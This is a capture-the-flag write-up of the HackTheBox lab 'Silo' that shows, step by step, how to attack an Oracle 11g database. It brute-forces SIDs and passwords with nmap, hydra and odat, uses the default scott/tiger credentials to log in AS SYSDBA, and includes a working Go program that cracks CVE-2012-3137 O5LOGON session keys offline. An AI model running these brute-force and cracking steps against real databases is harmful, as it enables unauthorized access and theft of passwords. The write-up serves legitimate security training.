Oracle DB


Nmap discovered that port 1521 is open. Port 1521 is the default port of the Oracle Database listener (TNS listener), which accepts incoming connections to an Oracle database. The version is 11.2.0.2.0, which is severely outdated.

By default, Oracle TNS Listener <= 12.1 runs with SYSTEM level privileges on Windows installations (on Linux it runs as the oracle user instead). Exploiting this service therefore results in direct SYSTEM-level access.

Exploiting Oracle DB

DB


When working with the Oracle TNS listener (Oracle Database listener) on port 1521, 1522, or 1529, enumerating databases is the first step of the operation. Each database instance is identified by a unique SID (System Identifier), which can be brute-forced with many available tools.

nmap


I can use nmap's oracle-sid-brute script to brute-force the SIDs of the databases on the server.

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ nmap --script oracle-sid-brute -p 1521 $IP
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-17 21:17 CEST
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.10.10.82
Host is up (0.030s latency).
 
PORT     STATE SERVICE
1521/tcp open  oracle
| oracle-sid-brute: 
|_  XE
 
Nmap done: 1 IP address (1 host up) scanned in 52.62 seconds

Nmap discovered a DB: XE. xe is the default database created when installing Oracle Database Express Edition, hence the name.

hydra


hydra also supports brute-forcing Oracle DB SIDs.

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ hydra -L wordlists/sids-oracle.txt oracle-sid://$IP:1521
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-17 17:09:01
[DATA] max 16 tasks per 1 server, overall 16 tasks, 737 login tries (l:737/p:1), ~47 tries per task
[DATA] attacking oracle-sid://10.10.10.82:1521/
[1521][oracle-sid] host: 10.10.10.82   login: CLRExtProc
[1521][oracle-sid] host: 10.10.10.82   login: PLSExtProc
[1521][oracle-sid] host: 10.10.10.82   login: XE
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-17 17:10:22

hydra was able to enumerate 2 additional SIDs: CLRExtProc and PLSExtProc

It is important to note that CLRExtProc and PLSExtProc are technically NOT databases. They are the external procedure agents registered with the Oracle listener so that PL/SQL can call code outside the database (C libraries through PLSExtProc, .NET assemblies through CLRExtProc on Windows) in the context of the Oracle Database.

They answer the listener as valid service names and therefore show up when brute-forcing SIDs, but they are not instances to authenticate against with database credentials; the only real database here is still XE.

Odat


odat can be used to brute-force SIDs as well.

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ odat sidguesser -s $IP
 
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'xe' is a valid SID. Continue...  ###############################################################################  | ETA:  00:00:00 
100% |#################################################################################################################| Time: 00:00:49 
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |#################################################################################################################| Time: 00:00:01 
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'xe' is a valid SID. Continue...  ####################################################################             | ETA:  00:00:04 
100% |#################################################################################################################| Time: 00:00:44 
[+] SIDs found on the 10.10.10.82:1521 server: XE

XE

Credentials


Once the databases are enumerated, the next step is extracting credentials. This can also be done by brute-forcing with many available tools.

I will be using odat to guess credentials, as it is the most reliable method.

One key thing to remember is that versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are VULNERABLE to offline brute force of the O5LOGON authentication exchange, known as CVE-2012-3137: the server's AUTH_SESSKEY response to a logon attempt is encrypted under a key derived from the user's password, so password guesses can be tested offline without sending further logins.

The target Oracle DB server is 11.2.0.2.0, which falls within that vulnerable range.

It is also EXTREMELY important to note that the Oracle Database server locks accounts after multiple failed login attempts (FAILED_LOGIN_ATTEMPTS in the user's profile, 10 in the 11g DEFAULT profile), much like the account lockout policy in Active Directory. Online guessing against a real target must therefore stay below that threshold per account.
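To show what the offline attack behind CVE-2012-3137 actually looks like, here is an added Go example; it is my own illustration, not code from this writeup or from odat. It follows the published O5LOGON analysis as implemented by John the Ripper's o5logon format: the server's 48-byte AUTH_SESSKEY is AES-192-CBC ciphertext (zero IV) under the key SHA1(password || AUTH_VFR_DATA) padded with four zero bytes, and a correct guess reveals eight bytes of 0x08 PKCS#5 padding in the last block, so only the last CBC block needs to be decrypted per guess. The function names (CheckCandidate, Crack, MakeSessKey) are mine, and MakeSessKey exists only to fabricate a test value: on an engagement AUTH_SESSKEY and AUTH_VFR_DATA come from the captured authentication exchange, one handshake per username rather than one login attempt per guess, which is why the lockout counter above is not a problem for this path. The salt and wordlist are constructed sample data.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha1"
	"fmt"
)

// o5logonKey derives the AES-192 key Oracle 11g O5LOGON uses to encrypt
// AUTH_SESSKEY: SHA1(password || salt) followed by four zero bytes (24 bytes).
// salt is the 10-byte AUTH_VFR_DATA the server returns with the key.
func o5logonKey(password string, salt []byte) []byte {
	h := sha1.New()
	h.Write([]byte(password))
	h.Write(salt)
	return append(h.Sum(nil), 0, 0, 0, 0)
}

// CheckCandidate tests one password guess against a captured AUTH_SESSKEY.
// Only the last CBC block is decrypted: P[2] = D(C[2]) XOR C[1]. A correct
// key leaves 0x08 x 8 PKCS#5 padding in its trailing eight bytes.
func CheckCandidate(sessKey, salt []byte, candidate string) (bool, error) {
	if len(sessKey) != 48 {
		return false, fmt.Errorf("AUTH_SESSKEY must be 48 bytes, got %d", len(sessKey))
	}
	if len(salt) != 10 {
		return false, fmt.Errorf("AUTH_VFR_DATA must be 10 bytes, got %d", len(salt))
	}
	block, err := aes.NewCipher(o5logonKey(candidate, salt))
	if err != nil {
		return false, err
	}
	var last [16]byte
	block.Decrypt(last[:], sessKey[32:48])
	for i := range last {
		last[i] ^= sessKey[16+i] // CBC: XOR with the previous ciphertext block
	}
	return bytes.Equal(last[8:], bytes.Repeat([]byte{8}, 8)), nil
}

// Crack runs CheckCandidate over a wordlist and returns the first password
// that yields valid padding (a false positive has probability 2^-64).
func Crack(sessKey, salt []byte, wordlist []string) (string, bool) {
	for _, w := range wordlist {
		if ok, err := CheckCandidate(sessKey, salt, w); err == nil && ok {
			return w, true
		}
	}
	return "", false
}

// MakeSessKey simulates the server for testing only: a random 40-byte session
// key plus 8 bytes of 0x08 padding, AES-192-CBC encrypted with zero IV under
// the key derived from the real password. On a target this value is captured.
func MakeSessKey(password string, salt []byte) ([]byte, error) {
	block, err := aes.NewCipher(o5logonKey(password, salt))
	if err != nil {
		return nil, err
	}
	plain := make([]byte, 48)
	if _, err := rand.Read(plain[:40]); err != nil {
		return nil, err
	}
	copy(plain[40:], bytes.Repeat([]byte{8}, 8))
	ct := make([]byte, 48)
	cipher.NewCBCEncrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(ct, plain)
	return ct, nil
}

func main() {
	salt := []byte("0123456789") // constructed 10-byte AUTH_VFR_DATA
	sessKey, err := MakeSessKey("tiger", salt)
	if err != nil {
		panic(err)
	}
	// Constructed wordlist of well-known Oracle default passwords.
	pw, found := Crack(sessKey, salt, []string{"oracle", "manager", "change_on_install", "tiger"})
	fmt.Printf("found=%v password=%q\n", found, pw)
}
```

Each guess costs one SHA1 and one AES block decryption, which is why a captured handshake from an 11.2.0.2 server can be run against large wordlists far faster than odat's online guessing, and without touching FAILED_LOGIN_ATTEMPTS.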

Odat


odat is capable of far more than SID or credential guessing. It is a complete penetration testing framework designed for Oracle DB.

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ odat passwordguesser -s $IP -d XE
 
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
the login abm has already been tested at least once. what do you want to do:                                           | ETA:  --:--:-- 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
C
[!] notice: 'ctxsys' account is locked, so skipping this username for password                                         | ETA:  00:03:18 
[!] notice: 'dip' account is locked, so skipping this username for password                                            | ETA:  00:02:55 
[!] notice: 'hr' account is locked, so skipping this username for password                                             | ETA:  00:02:17 
[!] notice: 'mdsys' account is locked, so skipping this username for password                                          | ETA:  00:01:42 
[!] notice: 'oracle_ocm' account is locked, so skipping this username for password                                     | ETA:  00:01:18 
[!] notice: 'outln' account is locked, so skipping this username for password#                                         | ETA:  00:01:10 
[+] valid credentials found: scott/tiger. Continue...                       ####################                       | ETA:  00:00:38 
[!] notice: 'xdb' account is locked, so skipping this username for password#######################################     | ETA:  00:00:07 
100% |#################################################################################################################| time: 00:03:10 
[+] accounts found on 10.10.10.82:1521/sid:XE: 
scott/tiger

It showed a few locked accounts, which odat skipped since a locked account cannot be authenticated and further attempts against it would only add noise. A valid credential was also found: scott/tiger

scott/tiger is a well-known default credential in Oracle DB (the SCOTT sample schema).

Connecting to the server


Now that I have a valid SID and credentials, I can connect to the database and enumerate further. For this step, I will be using a tool called sqlplus.

sqlplus


sqlplus (SQL*Plus) is the basic command-line client developed by Oracle that comes with every Oracle Database Server or Client installation; on Kali it is installed from the Oracle Instant Client packages. The installation process appears to be very simple, and I followed it through. There is also an article that I used as a reference for Oracle SQL queries.

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ sqlplus scott/tiger@$IP/XE            

SQL*Plus: Release 19.0.0.0.0 - Production on Tue Jan 17 19:45:38 2023
Version 19.6.0.0.0

Copyright (c) 1982, 2019, Oracle.  All rights reserved.

ERROR:
ORA-28002: the password will expire within 7 days



Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

SQL>

Using sqlplus, I am now connected to the XE DB as the scott user. The ORA-28002 warning is only a password expiry notice; the login itself succeeded.

Listing Users


SQL> SELECT * FROM all_users;                         
 
USERNAME			   USER_ID CREATED
------------------------------ ----------
XS$NULL 		    2147483638 29-MAY-14
SCOTT				        48 01-JAN-18
APEX_040000			        47 29-MAY-14
APEX_PUBLIC_USER		    45 29-MAY-14
FLOWS_FILES			        44 29-MAY-14
HR				            43 29-MAY-14
MDSYS				        42 29-MAY-14
ANONYMOUS			        35 29-MAY-14
XDB				            34 29-MAY-14
CTXSYS				        32 29-MAY-14
APPQOSSYS			        30 29-MAY-14
 
USERNAME			   USER_ID CREATED
------------------------------ ----------
DBSNMP				        29 29-MAY-14
ORACLE_OCM			        21 29-MAY-14
DIP				            14 29-MAY-14
OUTLN					     9 29-MAY-14
SYSTEM					     5 29-MAY-14
SYS					         0 29-MAY-14
 
17 rows selected.
 

With SELECT * FROM all_users; I am able to list every user in the database. I can see a few familiar usernames that odat enumerated earlier, including the locked ones it skipped.

Listing tables owned by current user


SQL> SELECT table_name FROM user_tables;
 
TABLE_NAME
------------------------------
DEPT
EMP
BONUS
SALGRADE

There are 4 tables owned by the scott user.

DEPT

SQL> SELECT * FROM DEPT;
 
    DEPTNO DNAME	  LOC
---------- -------------- -------------
	10 ACCOUNTING	  NEW YORK
	20 RESEARCH	  DALLAS
	30 SALES	  CHICAGO
	40 OPERATIONS	  BOSTON

EMP

SQL> SELECT * FROM EMP;
 
     EMPNO ENAME      JOB	       MGR HIREDATE	    SAL       COMM
---------- ---------- --------- ---------- --------- ---------- ----------
    DEPTNO
----------
      7369 SMITH      CLERK	      7902 17-DEC-80	    800
	20
 
      7499 ALLEN      SALESMAN	      7698 20-FEB-81	   1600        300
	30
 
      7521 WARD       SALESMAN	      7698 22-FEB-81	   1250        500
	30
 
 
     EMPNO ENAME      JOB	       MGR HIREDATE	    SAL       COMM
---------- ---------- --------- ---------- --------- ---------- ----------
    DEPTNO
----------
      7566 JONES      MANAGER	      7839 02-APR-81	   2975
	20
 
      7654 MARTIN     SALESMAN	      7698 28-SEP-81	   1250       1400
	30
 
      7698 BLAKE      MANAGER	      7839 01-MAY-81	   2850
	30
 
 
     EMPNO ENAME      JOB	       MGR HIREDATE	    SAL       COMM
---------- ---------- --------- ---------- --------- ---------- ----------
    DEPTNO
----------
      7782 CLARK      MANAGER	      7839 09-JUN-81	   2450
	10
 
      7788 SCOTT      ANALYST	      7566 19-APR-87	   3000
	20
 
      7839 KING       PRESIDENT 	   17-NOV-81	   5000
	10
 
 
     EMPNO ENAME      JOB	       MGR HIREDATE	    SAL       COMM
---------- ---------- --------- ---------- --------- ---------- ----------
    DEPTNO
----------
      7844 TURNER     SALESMAN	      7698 08-SEP-81	   1500 	 0
	30
 
      7876 ADAMS      CLERK	      7788 23-MAY-87	   1100
	20
 
      7900 JAMES      CLERK	      7698 03-DEC-81	    950
	30
 
 
     EMPNO ENAME      JOB	       MGR HIREDATE	    SAL       COMM
---------- ---------- --------- ---------- --------- ---------- ----------
    DEPTNO
----------
      7902 FORD       ANALYST	      7566 03-DEC-81	   3000
	20
 
      7934 MILLER     CLERK	      7782 23-JAN-82	   1300
	10
 
 
14 rows selected.

BONUS

SQL> SELECT * FROM BONUS;
 
no rows selected

The BONUS table is empty.

SALGRADE

SQL> SELECT * FROM SALGRADE;
 
     GRADE	LOSAL	   HISAL
---------- ---------- ----------
	 1	  700	    1200
	 2	 1201	    1400
	 3	 1401	    2000
	 4	 2001	    3000
	 5	 3001	    9999

Listing tables accessible by current user


SQL> SELECT table_name,owner FROM all_tables;
 
TABLE_NAME		       OWNER
------------------------------ ------------------------------
DUAL			       SYS
SYSTEM_PRIVILEGE_MAP	       SYS
TABLE_PRIVILEGE_MAP	       SYS
STMT_AUDIT_OPTION_MAP	       SYS
AUDIT_ACTIONS		       SYS
WRR$_REPLAY_CALL_FILTER        SYS
HS_BULKLOAD_VIEW_OBJ	       SYS
HS$_PARALLEL_METADATA	       SYS
HS_PARTITION_COL_NAME	       SYS
HS_PARTITION_COL_TYPE	       SYS
HELP			       SYSTEM
 
TABLE_NAME		       OWNER
------------------------------ ------------------------------
DR$OBJECT_ATTRIBUTE	       CTXSYS
DR$POLICY_TAB		       CTXSYS
DR$THS			       CTXSYS
DR$THS_PHRASE		       CTXSYS
DR$NUMBER_SEQUENCE	       CTXSYS
SRSNAMESPACE_TABLE	       MDSYS
OGIS_SPATIAL_REFERENCE_SYSTEMS MDSYS
OGIS_GEOMETRY_COLUMNS	       MDSYS
SDO_UNITS_OF_MEASURE	       MDSYS
SDO_PRIME_MERIDIANS	       MDSYS
SDO_ELLIPSOIDS		       MDSYS
 
TABLE_NAME		       OWNER
------------------------------ ------------------------------
SDO_DATUMS		       MDSYS
SDO_COORD_SYS		       MDSYS
SDO_COORD_AXIS_NAMES	       MDSYS
SDO_COORD_AXES		       MDSYS
SDO_COORD_REF_SYS	       MDSYS
SDO_COORD_OP_METHODS	       MDSYS
SDO_COORD_OPS		       MDSYS
SDO_PREFERRED_OPS_SYSTEM       MDSYS
SDO_PREFERRED_OPS_USER	       MDSYS
SDO_COORD_OP_PATHS	       MDSYS
SDO_COORD_OP_PARAMS	       MDSYS
 
TABLE_NAME		       OWNER
------------------------------ ------------------------------
SDO_COORD_OP_PARAM_USE	       MDSYS
SDO_COORD_OP_PARAM_VALS        MDSYS
SDO_CS_SRS		       MDSYS
NTV2_XML_DATA		       MDSYS
SDO_CRS_GEOGRAPHIC_PLUS_HEIGHT MDSYS
SDO_PROJECTIONS_OLD_SNAPSHOT   MDSYS
SDO_ELLIPSOIDS_OLD_SNAPSHOT    MDSYS
SDO_DATUMS_OLD_SNAPSHOT        MDSYS
SDO_XML_SCHEMAS 	       MDSYS
WWV_FLOW_DUAL100	       APEX_040000
DEPT			       SCOTT
 
TABLE_NAME		       OWNER
------------------------------ ------------------------------
EMP			       SCOTT
BONUS			       SCOTT
SALGRADE		       SCOTT
WWV_FLOW_TEMP_TABLE	       APEX_040000
WWV_FLOW_LOV_TEMP	       APEX_040000
SDO_TOPO_DATA$		       MDSYS
SDO_TOPO_RELATION_DATA	       MDSYS
SDO_TOPO_TRANSACT_DATA	       MDSYS
SDO_CS_CONTEXT_INFORMATION     MDSYS
SDO_TXN_IDX_EXP_UPD_RGN        MDSYS
SDO_TXN_IDX_DELETES	       MDSYS
 
TABLE_NAME		       OWNER
------------------------------ ------------------------------
SDO_TXN_IDX_INSERTS	       MDSYS
SDO_ST_TOLERANCE	       MDSYS
XDB$XIDX_IMP_T		       XDB
KU$_DATAPUMP_MASTER_10_1       SYS
KU$_DATAPUMP_MASTER_11_1       SYS
KU$_DATAPUMP_MASTER_11_1_0_7   SYS
KU$_DATAPUMP_MASTER_11_2       SYS
IMPDP_STATS		       SYS
ODCI_PMO_ROWIDS$	       SYS
ODCI_WARNINGS$		       SYS
ODCI_SECOBJ$		       SYS
 
TABLE_NAME		       OWNER
------------------------------ ------------------------------
KU$_LIST_FILTER_TEMP_2	       SYS
KU$_LIST_FILTER_TEMP	       SYS
KU$NOEXP_TAB		       SYS
OL$NODES		       SYSTEM
OL$HINTS		       SYSTEM
OL$			       SYSTEM
PLAN_TABLE$		       SYS
WRI$_ADV_ASA_RECO_DATA	       SYS
PSTUBTBL		       SYS
 
75 rows selected.

Listing all tables


SQL> SELECT table_name, owner FROM dba_tables;
SELECT table_name, owner FROM dba_tables
                              *
ERROR at line 1:
ORA-00942: table or view does not exist

The scott user is not able to query dba_tables. The DBA_* views list the objects of every schema and require the DBA role, SELECT_CATALOG_ROLE, or the SELECT ANY DICTIONARY privilege, none of which scott has; the ALL_* views only show what the current user can access.

DBA as in database administrator.

Listing session privileges


SQL> SELECT * FROM session_privs;          
 
PRIVILEGE
----------------------------------------
CREATE SESSION
CREATE TABLE
CREATE CLUSTER
CREATE SEQUENCE
CREATE PROCEDURE
CREATE TRIGGER
CREATE TYPE
CREATE OPERATOR
CREATE INDEXTYPE
 
9 rows selected.

With SELECT * FROM session_privs; I can also list the system privileges active in the current session. They are all CREATE privileges (CREATE SESSION from the CONNECT role, the other eight from RESOURCE), so despite the length of the list the scott user holds nothing administrative.

SQL> SELECT * FROM user_role_privs;
 
USERNAME		       GRANTED_ROLE		      ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT			       CONNECT			      NO  YES NO
SCOTT			       RESOURCE 		      NO  YES NO

With SELECT * FROM user_role_privs; the current user's roles can be checked. Based on the output, the scott user holds only CONNECT and RESOURCE and doesn't seem that special.

Checking if user environment is administrative

SQL> SELECT userenv('ISDBA') FROM dual;
 
USEREN
------
FALSE

The scott user is not connected with an administrative privilege: this session was opened as a normal user, not AS SYSDBA or AS SYSOPER.

Connecting to the server as SYSDBA


SYSDBA is an administrative system privilege rather than an ordinary role. A session connected AS SYSDBA is a fully empowered database administrator and operates as the SYS schema regardless of which user authenticated.

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ sqlplus scott/tiger@$IP/XE 'as SYSDBA'
 
SQL*Plus: Release 19.0.0.0.0 - Production on Tue Jan 17 20:27:54 2023
Version 19.6.0.0.0
 
Copyright (c) 1982, 2019, Oracle.  All rights reserved.
 
 
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
 
SQL> 

The scott user is able to authenticate to the XE DB as SYSDBA. This only works because SCOTT has been granted the SYSDBA privilege on this server: remote password-authenticated AS SYSDBA logins are checked against the password file (SELECT * FROM v$pwfile_users; lists the users in it), and scott/tiger alone does not have that on a default install. Trying AS SYSDBA with every credential found is still a cheap check worth making.

SQL> SELECT userenv('ISDBA') FROM dual;
 
USEREN
------
TRUE

Now the query returns TRUE, as the session was authenticated with the SYSDBA privilege. This wasn't the case earlier.

As mentioned in the beginning, Oracle TNS Listener <= 12.1 runs with SYSTEM level privileges by default on Windows, and the database instance service runs under the same account. Accessing the Oracle Database server with the SYSDBA privilege therefore means that anything the database process can do on the host (read and write files, run operating system commands through PL/SQL or Java stored procedures) now runs with SYSTEM level privileges.